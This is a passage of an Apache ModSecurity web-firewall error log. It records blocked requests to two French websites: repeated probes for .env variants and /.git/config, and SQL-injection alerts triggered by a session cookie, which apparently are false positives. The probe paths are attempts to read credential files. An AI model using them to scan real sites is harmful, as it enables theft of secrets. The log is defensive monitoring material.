referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:31.149137 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6h3o_DFxNSZVmaX3OFAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:31.728303 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6h3o_DFxNSZVmaX3OFAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:32.754910 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6iHo_DFxNSZVmaX3OFgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:32.755216 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6iHo_DFxNSZVmaX3OFgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:33.325400 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6iHo_DFxNSZVmaX3OFgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:33.745443 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6iXo_DFxNSZVmaX3OGAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:33.745718 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6iXo_DFxNSZVmaX3OGAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:34.022999 2026] [security2:error] [pid 1605480:tid 1605522] [client 195.114.15.48:55762] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.env.local"] [unique_id "agI6ih2Cvzd_nyNfUm_9JQAAAQA"]
[Mon May 11 22:22:34.023139 2026] [security2:error] [pid 1534836:tid 1534888] [client 195.114.15.48:55746] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.env.example"] [unique_id "agI6iteaRXe5lR8y0ZOzoQAAAVE"]
[Mon May 11 22:22:34.023250 2026] [security2:error] [pid 1605480:tid 1605522] [client 195.114.15.48:55762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.env.local"] [unique_id "agI6ih2Cvzd_nyNfUm_9JQAAAQA"]
[Mon May 11 22:22:34.023378 2026] [security2:error] [pid 1534836:tid 1534888] [client 195.114.15.48:55746] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.env.example"] [unique_id "agI6iteaRXe5lR8y0ZOzoQAAAVE"]
[Mon May 11 22:22:34.028181 2026] [security2:error] [pid 1606352:tid 1606438] [client 195.114.15.48:55874] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/public/.env"] [unique_id "agI6ino_DFxNSZVmaX3OGwAAANM"]
[Mon May 11 22:22:34.028385 2026] [security2:error] [pid 1606352:tid 1606438] [client 195.114.15.48:55874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/public/.env"] [unique_id "agI6ino_DFxNSZVmaX3OGwAAANM"]
[Mon May 11 22:22:34.038602 2026] [security2:error] [pid 1590352:tid 1590399] [client 195.114.15.48:55844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/admin/.env"] [unique_id "agI6iq1q0G_aXAqWauT55AAAAIc"]
[Mon May 11 22:22:34.038705 2026] [security2:error] [pid 1605480:tid 1605543] [client 195.114.15.48:55824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.env.test"] [unique_id "agI6ih2Cvzd_nyNfUm_9JgAAARU"]
[Mon May 11 22:22:34.038724 2026] [security2:error] [pid 1588898:tid 1588911] [client 195.114.15.48:55782] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.env.backup"] [unique_id "agI6iqFW67LJTsgN3jQLGAAAAAw"]
[Mon May 11 22:22:34.038825 2026] [security2:error] [pid 1590352:tid 1590399] [client 195.114.15.48:55844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/admin/.env"] [unique_id "agI6iq1q0G_aXAqWauT55AAAAIc"]
[Mon May 11 22:22:34.038930 2026] [security2:error] [pid 1605480:tid 1605543] [client 195.114.15.48:55824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.env.test"] [unique_id "agI6ih2Cvzd_nyNfUm_9JgAAARU"]
[Mon May 11 22:22:34.038937 2026] [security2:error] [pid 1588898:tid 1588911] [client 195.114.15.48:55782] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.env.backup"] [unique_id "agI6iqFW67LJTsgN3jQLGAAAAAw"]
[Mon May 11 22:22:34.041246 2026] [security2:error] [pid 1534836:tid 1534886] [client 195.114.15.48:55744] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.env"] [unique_id "agI6iteaRXe5lR8y0ZOzowAAAU8"]
[Mon May 11 22:22:34.041418 2026] [security2:error] [pid 1534836:tid 1534886] [client 195.114.15.48:55744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.env"] [unique_id "agI6iteaRXe5lR8y0ZOzowAAAU8"]
[Mon May 11 22:22:34.107626 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6iXo_DFxNSZVmaX3OGAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:34.421615 2026] [security2:error] [pid 1588898:tid 1588915] [client 195.114.15.48:55662] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.git/config"] [unique_id "agI6iqFW67LJTsgN3jQLGgAAABA"]
[Mon May 11 22:22:34.421890 2026] [security2:error] [pid 1588898:tid 1588915] [client 195.114.15.48:55662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.git/config"] [unique_id "agI6iqFW67LJTsgN3jQLGgAAABA"]
[Mon May 11 22:22:35.404586 2026] [security2:error] [pid 1588898:tid 1588911] [client 195.114.15.48:55782] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6iqFW67LJTsgN3jQLGAAAAAw"]
[Mon May 11 22:22:35.449341 2026] [security2:error] [pid 1590352:tid 1590399] [client 195.114.15.48:55844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6iq1q0G_aXAqWauT55AAAAIc"]
[Mon May 11 22:22:35.454210 2026] [security2:error] [pid 1534836:tid 1534886] [client 195.114.15.48:55744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6iteaRXe5lR8y0ZOzowAAAU8"]
[Mon May 11 22:22:35.454977 2026] [security2:error] [pid 1590352:tid 1590414] [client 195.114.15.48:55794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/.env.old"] [unique_id "agI6i61q0G_aXAqWauT55wAAAJY"]
[Mon May 11 22:22:35.455216 2026] [security2:error] [pid 1590352:tid 1590414] [client 195.114.15.48:55794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/.env.old"] [unique_id "agI6i61q0G_aXAqWauT55wAAAJY"]
[Mon May 11 22:22:35.461396 2026] [security2:error] [pid 1605480:tid 1605543] [client 195.114.15.48:55824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6ih2Cvzd_nyNfUm_9JgAAARU"]
[Mon May 11 22:22:35.487751 2026] [security2:error] [pid 1534836:tid 1534888] [client 195.114.15.48:55746] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6iteaRXe5lR8y0ZOzoQAAAVE"]
[Mon May 11 22:22:35.490762 2026] [security2:error] [pid 1605480:tid 1605522] [client 195.114.15.48:55762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6ih2Cvzd_nyNfUm_9JQAAAQA"]
[Mon May 11 22:22:35.663061 2026] [security2:error] [pid 1606352:tid 1606438] [client 195.114.15.48:55874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6ino_DFxNSZVmaX3OGwAAANM"]
[Mon May 11 22:22:35.941646 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6i3o_DFxNSZVmaX3OHgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:35.941927 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6i3o_DFxNSZVmaX3OHgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:22:35.975834 2026] [security2:error] [pid 1601130:tid 1601173] [client 195.114.15.48:55830] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "gilours.fr"] [uri "/api/.env"] [unique_id "agI6i3EgAO_835W6c1mVGwAAAFc"]
[Mon May 11 22:22:35.976073 2026] [security2:error] [pid 1601130:tid 1601173] [client 195.114.15.48:55830] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "gilours.fr"] [uri "/api/.env"] [unique_id "agI6i3EgAO_835W6c1mVGwAAAFc"]
[Mon May 11 22:22:36.227653 2026] [security2:error] [pid 1588898:tid 1588915] [client 195.114.15.48:55662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6iqFW67LJTsgN3jQLGgAAABA"]
[Mon May 11 22:22:36.548628 2026] [security2:error] [pid 1590352:tid 1590414] [client 195.114.15.48:55794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "gilours.fr"] [uri "/index.php"] [unique_id "agI6i61q0G_aXAqWauT55wAAAJY"]
